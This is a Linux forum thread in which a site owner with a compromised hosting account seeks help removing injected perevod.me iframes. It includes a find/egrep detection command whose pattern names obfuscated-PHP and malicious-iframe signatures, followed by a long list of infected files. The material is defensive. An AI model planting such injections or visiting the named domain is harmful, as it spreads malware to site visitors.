Find the answer to your Linux question:
Results 1 to 10 of 10
I have a huge problem! For several years I have paid for a hosting service and after installing a mobile access service to allow cell phone access to my sites, ...
Enjoy an ad free experience by logging in. Not a member yet? Register.
  1. #1
    Just Joined!
    Join Date
    Feb 2013
    Posts
    5

    hosting server find and replace script?


    I have a huge problem! For several years I have paid for a hosting service and after installing a mobile access service to allow cell phone access to my sites, all heck broke loose. I had a pulgin hacked and yes I am 99% certain it was the mobi access as timing is way too coincidental. So now I have a infected hosting server. I was told to write a find and replace script by their tech support. To be honest I have not worked with linux/Unix in years (1980's) and am not confident enough to try this without advice.

    I will give below the line so you can see whats found. The tech support guy was kind enough to do a search for the perevod.me iframes hack/infection.

    find ./ -type f \( -iname \*.php -o -iname \*html\* -o -iname \*.js \) -print0 |xargs -0 egrep -ils '(eval\(base64\_decode|Array\(base64\_decode|\/*\/preg\_replace\(|function_exists\(.*\_jquery\_theme |iframe src\=\"xxxx\:\/\/perevod)'

    had to replace the http with xxxx above because the site here thinks I am posting a link.

    Now I have to figure out how to use a script to remove this trash.

    Additional question: I found out the site perevod dot me is a fraud site according to the WHOIS Search, Domain Name, Website, and IP Tools - Who. information. The site city is fake, judging by the zip code, the telephone number is a sales infomecial for HGH, and the street address is also fake. I thought ICANN would disallow a registration over the fraud. How can I get this site removed as it is the hackers/infection site and it is also a blacklisted site loaded with really bad malware.

    Anyways can anyone give me some advice on how to do a find and replace script?

  2. #2
    Trusted Penguin Irithori's Avatar
    Join Date
    May 2009
    Location
    Munich
    Posts
    3,444
    Hi and welcome

    Sorry, but a search&replace is not enough, because it only removes the symptom, not the cause.

    My recommendation is to take this host off the net,
    analyze how the hack happened
    backup and verify your data, config and logs
    and then install a new system.
    You must always face the curtain with a bow.

  3. #3
    Just Joined!
    Join Date
    Feb 2013
    Posts
    5
    The problem appears to be the plugin, this was looked at by myself, and two techs at the server hosting company, and the techs reported the exploit to their management to have the plugin company put on notice. So this problem and plugin has been banished, and since there has been zero intrusions. Now I need to get rid of the iframes left over.



    Quote Originally Posted by Irithori View Post
    Hi and welcome

    Sorry, but a search&replace is not enough, because it only removes the symptom, not the cause.

    My recommendation is to take this host off the net,
    analyze how the hack happened
    backup and verify your data, config and logs
    and then install a new system.

  4. $spacer_open
    $spacer_close
  5. #4
    Trusted Penguin Irithori's Avatar
    Join Date
    May 2009
    Location
    Munich
    Posts
    3,444
    Best practice is to reinstall. Your call.

    The find line in your first post will provide a filelist.
    So the next best recommendation is to recover these files from a point in time before this plugin has been installed.
    You must always face the curtain with a bow.

  6. #5
    Just Joined!
    Join Date
    Feb 2013
    Posts
    5
    A backup and reinstall will not work. They did a huge upgrade and server maintenance Sunday and all the backups are corrupted now. Plus the backups are not old enough to be prior to the plugin addition months ago. Yes I should have not trusted the server to have good backups going back that far, but whats done is done.

    I need to know how to write a find and replace to remove this problem as all the 400.shtml files are also infected, this infection is so pervasive it has even infected themes and you name it. So short of destroying years of work, and site information, I need to try a script to avoid the loss of several years of running 3 sites.

    Does anyone have enough knowledge to advise me how to write such a script?


    Quote Originally Posted by Irithori View Post
    Best practice is to reinstall. Your call.

    The find line in your first post will provide a filelist.
    So the next best recommendation is to recover these files from a point in time before this plugin has been installed.

  7. #6
    Trusted Penguin Irithori's Avatar
    Join Date
    May 2009
    Location
    Munich
    Posts
    3,444
    Search&replace is hard, if neither the current infected nor previous good state is given..
    I tried to find technical background information about what "perevod" actually changes, especially if really only webfiles (.html, .js, etc) are affected.
    But apart from pointers to some obscure russian sites, I couldnt find anything.

    As you and the techs looked at the hack: Can you tell and print in total what has been inserted?
    For obvious reasons, please make sure that links to malicious sites are not pasted verbatim here.
    Also please use code tags.
    You must always face the curtain with a bow.

  8. #7
    Just Joined!
    Join Date
    Feb 2013
    Posts
    5
    here is a find script we used. This may be only a partial list.

    ..........................................

    ./builder/loader_err.html
    ./builder/mobifiles/d2/res/themes/images/bgMetal.html
    ./builder/mobifiles/d2/res/themes/images/chevron.html
    ./builder/mobifiles/d2/res/themes/images/chevron_dg.html
    ./builder/mobifiles/d2/res/themes/.html
    ./builder/mobifiles/d2/res/themes/apple/img/listArrow.html
    ./builder/mobifiles/d4/res/themes/images/bgMetal.html
    ./builder/mobifiles/d4/res/themes/images/chevron.html
    ./builder/mobifiles/d4/res/themes/images/chevron_dg.html
    ./builder/mobifiles/d4/res/themes/.html
    ./builder/mobifiles/d4/res/themes/apple/img/listArrow.html
    ./builder/mobifiles/d9/res/themes/images/bgMetal.html
    ./builder/mobifiles/d9/res/themes/images/chevron.html
    ./builder/mobifiles/d9/res/themes/images/chevron_dg.html
    ./builder/mobifiles/d9/res/themes/.html
    ./builder/mobifiles/d9/res/themes/apple/img/listArrow.html
    ./builder/mobifiles/d3/res/themes/images/bgMetal.html
    ./builder/mobifiles/d3/res/themes/images/chevron.html
    ./builder/mobifiles/d3/res/themes/images/chevron_dg.html
    ./builder/mobifiles/d3/res/themes/.html
    ./builder/mobifiles/d3/res/themes/apple/img/listArrow.html
    ./themes/sandium/page.tpl.php
    ./themes/bluemarine/page.tpl.php
    ./themes/garland/maintenance-page.tpl.php
    ./themes/garland/page.tpl.php
    ./themes/acquia_prosper/page.tpl.php
    ./themes/newswire/page.tpl.php
    ./themes/soldier/page.tpl.php
    ./themes/admire_navy_5.x-1.3/admire_navy/page.tpl.php
    ./themes/acquia_slate/page.tpl.php
    ./themes/pushbutton/page.tpl.php
    ./themes/elements_theme/page.tpl.php
    ./themes/colourise/maintenance-page.tpl.php
    ./themes/colourise/page.tpl.php
    ./themes/bealestreet/themes/bealestreet/page.tpl.php
    ./themes/addari/page.tpl.php
    ./themes/newsflash/page.tpl.php
    ./themes/admire_grunge/page.tpl.php
    ./themes/burn_360-0.7.4/README.html
    ./themes/burn_360-0.7.4/README.html~
    ./themes/genesis_darkmatter/page.tpl.php
    ./themes/tma/tma/page.tpl.php
    ./forums/install.bak/database_update.php
    ./forums/install.bak/index.php
    ./forums/cache/tpl_AeroBlack_viewtopic_print.html.php
    ./forums/cache/ctpl_admin_simple_footer.html.php
    ./forums/cache/tpl_AeroBlack_overall_footer.html.php
    ./forums/cache/tpl_AeroBlack_simple_footer.html.php
    ./forums/cache/ctpl_admin_overall_footer.html.php
    ./forums/styles/PlayStation/template/viewtopic_print.html
    ./forums/styles/PlayStation/template/simple_footer.html
    ./forums/styles/PlayStation/template/overall_footer.html
    ./forums/styles/PlayStation/template/ucp_pm_viewmessage_print.html
    ./forums/styles/GTA4/template/viewtopic_print.html
    ./forums/styles/GTA4/template/simple_footer.html
    ./forums/styles/GTA4/template/overall_footer.html
    ./forums/styles/GTA4/template/ucp_pm_viewmessage_print.html
    ./forums/styles/pro_MylCastel/template/viewtopic_print.html
    ./forums/styles/pro_MylCastel/template/simple_footer.html
    ./forums/styles/pro_MylCastel/template/overall_footer.html
    ./forums/styles/pro_MylCastel/template/ucp_pm_viewmessage_print.html
    ./forums/styles/Pro_iphone/template/viewtopic_print.html
    ./forums/styles/Pro_iphone/template/simple_footer.html
    ./forums/styles/Pro_iphone/template/overall_footer.html
    ./forums/styles/Pro_iphone/template/ucp_pm_viewmessage_print.html
    ./forums/styles/SpringFlowers/template/viewtopic_print.html
    ./forums/styles/SpringFlowers/template/simple_footer.html
    ./forums/styles/SpringFlowers/template/overall_footer.html
    ./forums/styles/SpringFlowers/template/ucp_pm_viewmessage_print.html
    ./forums/styles/360Elite/template/viewtopic_print.html
    ./forums/styles/360Elite/template/simple_footer.html
    ./forums/styles/360Elite/template/overall_footer.html
    ./forums/styles/360Elite/template/ucp_pm_viewmessage_print.html
    ./forums/styles/OATempleofZeus/template/viewtopic_print.html
    ./forums/styles/OATempleofZeus/template/simple_footer.html
    ./forums/styles/OATempleofZeus/template/overall_footer.html
    ./forums/styles/OATempleofZeus/template/ucp_pm_viewmessage_print.html
    ./forums/styles/hardcamo/template/viewtopic_print.html
    ./forums/styles/hardcamo/template/simple_footer.html
    ./forums/styles/hardcamo/template/overall_footer.html
    ./forums/styles/hardcamo/template/ucp_pm_viewmessage_print.html
    ./forums/styles/OAstrawberry/template/viewtopic_print.html
    ./forums/styles/OAstrawberry/template/simple_footer.html
    ./forums/styles/OAstrawberry/template/overall_footer.html
    ./forums/styles/OAstrawberry/template/ucp_pm_viewmessage_print.html
    ./forums/styles/Xbox_360/template/viewtopic_print.html
    ./forums/styles/Xbox_360/template/simple_footer.html
    ./forums/styles/Xbox_360/template/overall_footer.html
    ./forums/styles/Xbox_360/template/ucp_pm_viewmessage_print.html
    ./forums/styles/template/viewtopic_print.html
    ./forums/styles/template/simple_footer.html
    ./forums/styles/template/overall_footer.html
    ./forums/styles/template/ucp_pm_viewmessage_print.html
    ./forums/styles/AeroBlack/template/viewtopic_print.html
    ./forums/styles/AeroBlack/template/simple_footer.html
    ./forums/styles/AeroBlack/template/overall_footer.html
    ./forums/styles/AeroBlack/template/ucp_pm_viewmessage_print.html
    ./forums/installer-disabled/database_update.php
    ./forums/installer-disabled/index.php
    ./forums/install.old/database_update.php
    ./forums/install.old/index.php
    ./modules/book/book-export-html.tpl.php
    ./modules/system/maintenance-page.tpl.php
    ./modules/system/page.tpl.php
    ./401.shtml
    ./500.php
    ./403.shtml
    ./blogs/wp-includes/js/codepress/codepress.html
    ./blogs/wp-admin/import/blogware.php
    ./blogs/wp-admin/import/livejournal.php
    ./blogs/wp-admin/sidebar.php
    ./blogs/wp-content/themes/default/comments-popup.php
    ./blogs/wp-content/themes/default/footer.php
    ./blogs/wp-content/themes/classic/comments-popup.php
    ./blogs/wp-content/themes/classic/footer.php
    ./blogs/wp-content/themes/news-magazine-theme-640/footer.php
    ./administrator/components/com_joomlaxplorer/images/index.html
    ./administrator/components/com_joomlaxplorer/scripts/index.html
    ./administrator/components/com_joomlaxplorer/scripts/codepress/codepress.html
    ./administrator/components/com_joomlaxplorer/scripts/codepress/index.html
    ./administrator/components/com_joomlaxplorer/languages/index.html
    ./administrator/components/com_joomlaxplorer/style/index.html
    ./administrator/components/com_joomlaxplorer/index.html
    ./administrator/components/com_joomlaxplorer/ftp_tmp/index.html
    ./administrator/components/com_joomlaxplorer/include/fun_system_info.php
    ./administrator/components/com_joomlaxplorer/include/index.html
    ./administrator/components/com_joomlaxplorer/config/index.html
    ./administrator/components/com_joomlaxplorer/libraries/MIME/index.html
    ./administrator/components/com_joomlaxplorer/libraries/Archive/Writer/index.html
    ./administrator/components/com_joomlaxplorer/libraries/Archive/Predicate/index.html
    ./administrator/components/com_joomlaxplorer/libraries/Archive/index.html
    ./administrator/components/com_joomlaxplorer/libraries/Archive/Reader/index.html
    ./administrator/components/com_joomlaxplorer/libraries/index.html
    ./administrator/components/com_joomlaxplorer/libraries/FTP/index.html
    ./templates/images/copyrights/fam_fam_silk/index.html
    ./templates/images/copyrights/index.html
    ./templates/images/copyrights/tango/index.html
    ./templates/images/rtl/index.html
    ./templates/images/index.html
    ./templates/images/icons/index.html
    ./templates/soldier_of_fortune/component.php
    ./templates/soldier_of_fortune/index.html
    ./templates/soldier_of_fortune/html/mod_mainmenu/index.html
    ./templates/soldier_of_fortune/html/index.html
    ./templates/soldier_of_fortune/html/mod_syndicate/index.html
    ./templates/soldier_of_fortune/html/com_content/section/index.html
    ./templates/soldier_of_fortune/html/com_content/article/index.html
    ./templates/soldier_of_fortune/html/com_content/index.html
    ./templates/soldier_of_fortune/html/com_content/frontpage/index.html
    ./templates/soldier_of_fortune/html/com_content/category/index.html
    ./templates/com_gantry/tmpl/index-iphone.php
    ./templates/com_gantry/facets/menu/themes/basic/index.html
    ./templates/com_gantry/facets/menu/themes/touch/index.html
    ./templates/com_gantry/facets/menu/themes/index.html
    ./templates/com_gantry/facets/menu/themes/fusion/images/index.html
    ./templates/com_gantry/facets/menu/themes/fusion/js/index.html
    ./templates/com_gantry/facets/menu/themes/fusion/css/index.html
    ./templates/com_gantry/facets/menu/themes/fusion/index.html
    ./templates/com_gantry/facets/menu/index.html
    ./templates/com_gantry/admin/phpQuery.php
    ./templates/com_gantry/admin/ajax-models/diagnostics.php
    ./templates/com_gantry/admin/index.html
    ./templates/component.php
    ./templates/css/index.html
    ./templates/layouts/default.php
    ./templates/rt_grunge_j15/images/backgrounds/index.html
    ./templates/rt_grunge_j15/images/backgrounds/style1/index.html
    ./templates/rt_grunge_j15/images/body/index.html
    ./templates/rt_grunge_j15/images/body/style1/index.html
    ./templates/rt_grunge_j15/images/typography/index.html
    ./templates/rt_grunge_j15/images/index.html
    ./templates/rt_grunge_j15/images/icons/index.html
    ./templates/rt_grunge_j15/images/logo/index.html
    ./templates/rt_grunge_j15/images/logo/style1/index.html
    ./templates/rt_grunge_j15/js/index.html
    ./templates/rt_grunge_j15/debugbody.php
    ./templates/rt_grunge_j15/component.php
    ./templates/rt_grunge_j15/custom/menuitemparams/index.html
    ./templates/rt_grunge_j15/custom/index.html
    ./templates/rt_grunge_j15/css/index.html
    ./templates/rt_grunge_j15/params/index.html
    ./templates/rt_grunge_j15/index.php
    ./templates/rt_grunge_j15/admin/index.html
    ./templates/rt_grunge_j15/admin/presets/index.html
    ./templates/rt_grunge_j15/features/index.html
    ./templates/rt_grunge_j15/profile.php
    ./templates/rt_grunge_j15/html/mod_poll/index.html
    ./templates/rt_grunge_j15/html/mod_login/index.html
    ./templates/rt_grunge_j15/html/mod_breadcrumbs/index.html
    ./templates/rt_grunge_j15/html/mod_newsflash/index.html
    ./templates/rt_grunge_j15/html/com_weblinks/categories/index.html
    ./templates/rt_grunge_j15/html/com_weblinks/index.html
    ./templates/rt_grunge_j15/html/com_weblinks/weblink/index.html
    ./templates/rt_grunge_j15/html/com_weblinks/category/index.html
    ./templates/rt_grunge_j15/html/com_contact/contact/index.html
    ./templates/rt_grunge_j15/html/com_contact/category/index.html
    ./templates/rt_grunge_j15/html/index.html
    ./templates/rt_grunge_j15/html/com_poll/poll/index.html
    ./templates/rt_grunge_j15/html/com_poll/index.html
    ./templates/rt_grunge_j15/html/com_newsfeeds/newsfeed/index.html
    ./templates/rt_grunge_j15/html/com_newsfeeds/categories/index.html
    ./templates/rt_grunge_j15/html/com_newsfeeds/index.html
    ./templates/rt_grunge_j15/html/com_newsfeeds/category/index.html
    ./templates/rt_grunge_j15/html/com_content/section/section/index.html
    ./templates/rt_grunge_j15/html/com_content/section/index.html
    ./templates/rt_grunge_j15/html/com_content/article/index.html
    ./templates/rt_grunge_j15/html/com_content/index.html
    ./templates/rt_grunge_j15/html/com_content/frontpage/index.html
    ./templates/rt_grunge_j15/html/com_content/category/index.html
    ./templates/rt_grunge_j15/html/com_content/category/category/index.html
    ./templates/rt_grunge_j15/html/com_rokcandy/index.html
    ./templates/error.php
    ./templates/pizza/images/copyrights/fam_fam_silk/index.html
    ./templates/pizza/images/copyrights/index.html
    ./templates/pizza/images/copyrights/tango/index.html
    ./templates/pizza/images/rtl/index.html
    ./templates/pizza/images/index.html
    ./templates/pizza/images/icons/index.html
    ./templates/pizza/component.php
    ./templates/pizza/css/index.html
    ./templates/pizza/layouts/default.php
    ./templates/pizza/index.html
    ./templates/pizza/html/mod_poll/index.html
    ./templates/pizza/html/mod_login/index.html
    ./templates/pizza/html/mod_newsflash/index.html
    ./templates/pizza/html/com_weblinks/categories/index.html
    ./templates/pizza/html/com_weblinks/index.html
    ./templates/pizza/html/com_weblinks/category/index.html
    ./templates/pizza/html/com_contact/contact/index.html
    ./templates/pizza/html/com_contact/index.html
    ./templates/pizza/html/com_contact/category/index.html
    ./templates/pizza/html/mod_latestnews/index.html
    ./templates/pizza/html/com_search/search/index.html
    ./templates/pizza/html/com_search/index.html
    ./templates/pizza/html/mod_footer/index.html
    ./templates/pizza/html/com_user/reset/index.html
    ./templates/pizza/html/com_user/user/index.html
    ./templates/pizza/html/com_user/login/index.html
    ./templates/pizza/html/com_user/index.html
    ./templates/pizza/html/com_user/remind/index.html
    ./templates/pizza/html/com_user/register/index.html
    ./templates/pizza/html/mod_search/index.html
    ./templates/pizza/html/index.html
    ./templates/pizza/html/com_poll/poll/index.html
    ./templates/pizza/html/com_poll/index.html
    ./templates/pizza/html/mod_syndicate/index.html
    ./templates/pizza/html/com_newsfeeds/newsfeed/index.html
    ./templates/pizza/html/com_newsfeeds/categories/index.html
    ./templates/pizza/html/com_newsfeeds/index.html
    ./templates/pizza/html/com_newsfeeds/category/index.html
    ./templates/pizza/html/com_content/section/index.html
    ./templates/pizza/html/com_content/article/index.html
    ./templates/pizza/html/com_content/index.html
    ./templates/pizza/html/com_content/frontpage/index.html
    ./templates/pizza/html/com_content/category/index.html
    ./templates/themza_j15_17/images/index.html
    ./templates/themza_j15_17/js/index.html
    ./templates/themza_j15_17/component.php
    ./templates/themza_j15_17/css/index.html
    ./templates/themza_j15_17/index.html
    ./templates/themza_j15_17/index.php
    ./templates/themza_j15_17/html/index.html
    ./templates/html/mod_poll/index.html
    ./templates/html/mod_login/index.html
    ./templates/html/mod_newsflash/index.html
    ./templates/html/com_weblinks/categories/index.html
    ./templates/html/com_weblinks/index.html
    ./templates/html/com_weblinks/category/index.html
    ./templates/html/com_contact/contact/index.html
    ./templates/html/com_contact/index.html
    ./templates/html/com_contact/category/index.html
    ./templates/html/mod_latestnews/index.html
    ./templates/html/com_search/search/index.html
    ./templates/html/com_search/index.html
    ./templates/html/mod_footer/index.html
    ./templates/html/com_user/reset/index.html
    ./templates/html/com_user/user/index.html
    ./templates/html/com_user/login/index.html
    ./templates/html/com_user/index.html
    ./templates/html/com_user/remind/index.html
    ./templates/html/com_user/register/index.html
    ./templates/html/mod_search/index.html
    ./templates/html/index.html
    ./templates/html/com_poll/poll/index.html
    ./templates/html/com_poll/index.html
    ./templates/html/mod_banners/index.html
    ./templates/html/mod_syndicate/index.html
    ./templates/html/com_newsfeeds/newsfeed/index.html
    ./templates/html/com_newsfeeds/categories/index.html
    ./templates/html/com_newsfeeds/index.html
    ./templates/html/com_newsfeeds/category/index.html
    ./templates/html/com_content/section/index.html
    ./templates/html/com_content/article/index.html
    ./templates/html/com_content/index.html
    ./templates/html/com_content/frontpage/index.html
    ./templates/html/com_content/category/index.html
    ./templates/black_joomla_v1.0/component.php
    ./templates/black_joomla_v1.0/index.html
    ./templates/black_joomla_v1.0/index.php
    ./templates/black_joomla_v1.0/html/mod_mainmenu/index.html
    ./templates/black_joomla_v1.0/html/index.html
    ./templates/black_joomla_v1.0/html/mod_syndicate/index.html
    ./templates/black_joomla_v1.0/html/com_content/section/index.html
    ./templates/black_joomla_v1.0/html/com_content/article/index.html
    ./templates/black_joomla_v1.0/html/com_content/index.html
    ./templates/black_joomla_v1.0/html/com_content/frontpage/index.html
    ./templates/black_joomla_v1.0/html/com_content/category/index.html
    ./templates/iyosisj1/component.php
    ./templates/iyosisj1/index.php
    ./templates/iyosisj1/html/mod_banners/index.html
    ./templates/iyosisj1/html/com_content/section/index.html
    ./templates/iyosisj1/html/com_content/article/index.html
    ./templates/iyosisj1/html/com_content/index.html
    ./templates/iyosisj1/html/com_content/frontpage/index.html
    ./templates/iyosisj1/html/com_content/category/index.html
    ./index.html
    ./gallery/themes/stopdesign/albumarchive.php
    ./gallery/zp-core/refresh-metadata.php
    ./gallery/zp-core/albumsort.php
    ./gallery/zp-core/dynamic.php
    ./gallery/zp-core/cache-images.php
    ./profiles/wp-login.php
    ./profiles/modules/admin_help_english/docs/upgrade.html
    ./profiles/modules/admin_help_english/docs/admin_comments.html
    ./profiles/modules/admin_help_english/docs/users.html
    ./profiles/modules/admin_help_english/docs/modules.html
    ./profiles/modules/admin_help_english/docs/admin_index.html
    ./profiles/modules/admin_help_english/docs/templates.html
    ./profiles/modules/admin_help_english/docs/register.html
    ./profiles/modules/admin_help_english/docs/admin_modules.html
    ./profiles/modules/admin_help_english/docs/admin_users.html
    ./profiles/modules/admin_help_english/docs/vote.html
    ./profiles/modules/admin_help_english/docs/admin_categories.html
    ./profiles/modules/admin_help_english/docs/pligg_pro.html
    ./profiles/modules/admin_help_english/docs/core.html
    ./profiles/modules/admin_help_english/docs/admin_backup.html
    ./profiles/modules/admin_help_english/docs/admin_links.html
    ./profiles/modules/admin_help_english/docs/template_edit.html
    ./profiles/modules/admin_help_english/docs/admin_page.html
    ./profiles/modules/admin_help_english/docs/walkthrough.html
    ./profiles/modules/admin_help_english/docs/submit.html
    ./profiles/modules/admin_help_english/docs/welcome.html
    ./profiles/languages/readme_thai.html
    ./profiles/wp-includes/js/codepress/codepress.html
    ./profiles/wp-includes/js/tinymce/plugins/wpeditimage/editimage.html
    ./profiles/wp-includes/js/tinymce/wp-mce-help.php
    ./profiles/wp-includes/theme-compat/comments-popup.php
    ./profiles/wp-includes/theme-compat/footer.php
    ./profiles/wp-includes/functions.php
    ./profiles/wp-includes/functions.wp-scripts.php
    ./profiles/wp-includes/ms-deprecated.php
    ./profiles/wp-includes/ms-functions.php
    ./profiles/wp-includes/load.php
    ./profiles/wp-includes/wpmu-functions.php
    ./profiles/3rdparty/speller/spellchecker.html
    ./profiles/3rdparty/speller/server-scripts/spellchecker.php
    ./profiles/3rdparty/speller/controls.html
    ./profiles/wp-admin/import/blogware.php
    ./profiles/wp-admin/import/livejournal.php
    ./profiles/wp-admin/sidebar.php
    ./profiles/wp-admin/ms-edit.php
    ./profiles/wp-admin/maint/repair.php
    ./profiles/wp-admin/press-this.php
    ./profiles/wp-admin/install.php
    ./profiles/wp-admin/includes/media.php
    ./profiles/wp-admin/includes/template.php
    ./profiles/wp-admin/admin-footer.php
    ./profiles/wp-admin/upgrade.php
    ./profiles/wp-admin/wpmu-edit.php
    ./profiles/wp-admin/setup-config.php
    ./profiles/wp-content/themes/bphome/comments-popup.php
    ./profiles/wp-content/themes/bphome/footer.php
    ./profiles/wp-content/themes/home/comments-popup.php
    ./profiles/wp-content/themes/home/footer.php
    ./profiles/wp-content/themes/default/comments-popup.php
    ./profiles/wp-content/themes/default/footer.php
    ./profiles/wp-content/themes/classic/comments-popup.php
    ./profiles/wp-content/themes/classic/footer.php
    ./profiles/wp-content/themes/bp-sn-parent/footer.php
    ./profiles/wp-content/themes/twentyten/footer.php
    ./profiles/wp-content/themes/bp-default/footer.php
    ./profiles/wp-content/plugins/buddypress/bp-forums/bbpress/bb-templates/kakumei/footer.php
    ./profiles/wp-content/plugins/buddypress/bp-forums/bbpress/bb-admin/admin-footer.php
    ./profiles/wp-content/plugins/buddypress/bp-forums/bbpress/bb-includes/backpress/functions.core.php
    ./profiles/wp-content/plugins/buddypress/bp-forums/bbpress/bb-includes/functions.bb-core.php
    ./profiles/wp-content/plugins/buddypress/bp-themes/bp-default/footer.php
    ./profiles/wp-content/bp-themes/bpmember/footer.php
    ./profiles/wp-content/bp-themes/bpskeletonmember/footer.php
    ./profiles/wp-links-opml.php
    ./profiles/cache/templates_c/c_1__admin_admin_tpl.php
    ./profiles/cache/templates_c/c_1_wistie_pligg_tpl.php
    ./profiles/index-install.php
    ./profiles/admin/index.php
    ./profiles/libs/backup/mysql_backup/libs/gonxtabs.class.php
    ./profiles/libs/pre_install_check.php
    ./profiles/wp-app.php
    ./profiles/readme.html
    ./forumsold/instal.bat/database_update.php
    ./forumsold/instal.bat/index.php
    ./forumsold/download/file.php
    ./forumsold/docs/INSTALL.html
    ./forumsold/docs/README.html
    ./forumsold/docs/FAQ.html
    ./forumsold/docs/coding-guidelines.html
    ./forumsold/docs/hook_system.html
    ./forumsold/docs/auth_api.html
    ./forumsold/docs/CHANGELOG.html
    ./forumsold/includes/functions_jabber.php
    ./forumsold/includes/functions.php
    ./forumsold/includes/db/dbal.php
    ./forumsold/includes/acp/acp_php_info.php
    ./forumsold/adm/style/simple_footer.html
    ./forumsold/adm/style/overall_footer.html
    ./forumsold/adm/style/colour_swatch.html
    ./forumsold/adm/style/install_footer.html
    ./forumsold/cache/tpl_pro-MylCastel_overall_footer.html.php
    ./forumsold/cache/tpl_buziness-board_simple_footer.html.php
    ./forumsold/cache/tpl_martial_overall_footer.html.php
    ./forumsold/cache/ctpl_admin_simple_footer.html.php
    ./forumsold/cache/tpl_prosilver_overall_footer.html.php
    ./forumsold/cache/tpl_AeroBlack_overall_footer.html.php
    ./forumsold/cache/tpl_OATempleofZeus_overall_footer.html.php
    ./forumsold/cache/tpl_Pro-iphone_overall_footer.html.php
    ./forumsold/cache/tpl_buziness-board_overall_footer.html.php
    ./forumsold/cache/ctpl_admin_overall_footer.html.php
    ./forumsold/styles/pro_MylCastel/template/viewtopic_print.html
    ./forumsold/styles/pro_MylCastel/template/simple_footer.html
    ./forumsold/styles/pro_MylCastel/template/overall_footer.html
    ./forumsold/styles/pro_MylCastel/template/ucp_pm_viewmessage_print.html
    ./forumsold/styles/subsilver2/template/viewtopic_print.html
    ./forumsold/styles/subsilver2/template/simple_footer.html
    ./forumsold/styles/subsilver2/template/overall_footer.html
    ./forumsold/styles/subsilver2/template/ucp_pm_viewmessage_print.html
    ./forumsold/styles/Pro_iphone/template/viewtopic_print.html
    ./forumsold/styles/Pro_iphone/template/simple_footer.html
    ./forumsold/styles/Pro_iphone/template/overall_footer.html
    ./forumsold/styles/Pro_iphone/template/ucp_pm_viewmessage_print.html
    ./forumsold/styles/SpringFlowers/template/viewtopic_print.html
    ./forumsold/styles/SpringFlowers/template/simple_footer.html
    ./forumsold/styles/SpringFlowers/template/overall_footer.html
    ./forumsold/styles/SpringFlowers/template/ucp_pm_viewmessage_print.html
    ./forumsold/styles/OATempleofZeus/template/viewtopic_print.html
    ./forumsold/styles/OATempleofZeus/template/simple_footer.html
    ./forumsold/styles/OATempleofZeus/template/overall_footer.html
    ./forumsold/styles/OATempleofZeus/template/ucp_pm_viewmessage_print.html
    ./forumsold/styles/buziness_board/template/viewtopic_print.html
    ./forumsold/styles/buziness_board/template/simple_footer.html
    ./forumsold/styles/buziness_board/template/overall_footer.html
    ./forumsold/styles/buziness_board/template/ucp_pm_viewmessage_print.html
    ./forumsold/styles/OAstrawberry/template/viewtopic_print.html
    ./forumsold/styles/OAstrawberry/template/simple_footer.html
    ./forumsold/styles/OAstrawberry/template/overall_footer.html
    ./forumsold/styles/OAstrawberry/template/ucp_pm_viewmessage_print.html
    ./forumsold/styles/ProHalloween/template/viewtopic_print.html
    ./forumsold/styles/ProHalloween/template/simple_footer.html
    ./forumsold/styles/ProHalloween/template/overall_footer.html
    ./forumsold/styles/ProHalloween/template/ucp_pm_viewmessage_print.html
    ./forumsold/styles/AeroBlack/template/viewtopic_print.html
    ./forumsold/styles/AeroBlack/template/simple_footer.html
    ./forumsold/styles/AeroBlack/template/overall_footer.html
    ./forumsold/styles/AeroBlack/template/ucp_pm_viewmessage_print.html
    ./forumsold/styles/prosilver/template/viewtopic_print.html
    ./forumsold/styles/prosilver/template/simple_footer.html
    ./forumsold/styles/prosilver/template/overall_footer.html
    ./forumsold/styles/prosilver/template/ucp_pm_viewmessage_print.html
    ./forumsold/styles/martial/template/viewtopic_print.html
    ./forumsold/styles/martial/template/simple_footer.html
    ./forumsold/styles/martial/template/overall_footer.html
    ./forumsold/styles/martial/template/ucp_pm_viewmessage_print.html
    ./forumsold/install.old/index.php
    ./mysite/wp-includes/js/codepress/codepress.html
    ./mysite/wp-includes/wpmu-functions.php
    ./mysite/wp-admin/import/blogware.php
    ./mysite/wp-admin/import/livejournal.php
    ./mysite/wp-admin/wpmu-edit.php
    ./mysite/wp-content/themes/bphome/comments-popup.php
    ./mysite/wp-content/themes/bphome/footer.php
    ./mysite/wp-content/themes/bp-sn-parent/footer.php
    ./mysite/wp-content/themes/bp-default/footer.php
    ./mysite/wp-content/bp-themes/bpmember/footer.php
    ./mysite/wp-content/bp-themes/bpskeletonmember/footer.php
    ./mysite/index-install.php
    ./cache/mod_mainmenu/index.html
    ./cache/mod_banners/index.html
    ./400.shtml
    ./tmp/images/copyrights/fam_fam_silk/index.html
    ./tmp/images/copyrights/index.html
    ./tmp/images/copyrights/tango/index.html
    ./tmp/images/rtl/index.html
    ./tmp/images/index.html
    ./tmp/images/icons/index.html
    ./tmp/com_gantry/tmpl/index-iphone.php
    ./tmp/com_gantry/facets/menu/themes/basic/index.html
    ./tmp/com_gantry/facets/menu/themes/touch/index.html
    ./tmp/com_gantry/facets/menu/themes/index.html
    ./tmp/com_gantry/facets/menu/themes/fusion/images/index.html
    ./tmp/com_gantry/facets/menu/themes/fusion/js/index.html
    ./tmp/com_gantry/facets/menu/themes/fusion/css/index.html
    ./tmp/com_gantry/facets/menu/themes/fusion/index.html
    ./tmp/com_gantry/facets/menu/index.html
    ./tmp/com_gantry/admin/phpQuery.php
    ./tmp/com_gantry/admin/ajax-models/diagnostics.php
    ./tmp/com_gantry/admin/index.html
    ./tmp/component.php
    ./tmp/css/index.html
    ./tmp/js_education_grn_blu/js/index.html
    ./tmp/js_education_grn_blu/css/index.html
    ./tmp/js_education_grn_blu/index.php
    ./tmp/layouts/default.php
    ./tmp/rt_grunge_j15/images/backgrounds/index.html
    ./tmp/rt_grunge_j15/images/backgrounds/style1/index.html
    ./tmp/rt_grunge_j15/images/body/index.html
    ./tmp/rt_grunge_j15/images/body/style1/index.html
    ./tmp/rt_grunge_j15/images/typography/index.html
    ./tmp/rt_grunge_j15/images/index.html
    ./tmp/rt_grunge_j15/images/icons/index.html
    ./tmp/rt_grunge_j15/images/logo/index.html
    ./tmp/rt_grunge_j15/images/logo/style1/index.html
    ./tmp/rt_grunge_j15/js/index.html
    ./tmp/rt_grunge_j15/debugbody.php
    ./tmp/rt_grunge_j15/component.php
    ./tmp/rt_grunge_j15/custom/menuitemparams/index.html
    ./tmp/rt_grunge_j15/custom/index.html
    ./tmp/rt_grunge_j15/css/index.html
    ./tmp/rt_grunge_j15/params/index.html
    ./tmp/rt_grunge_j15/index.php
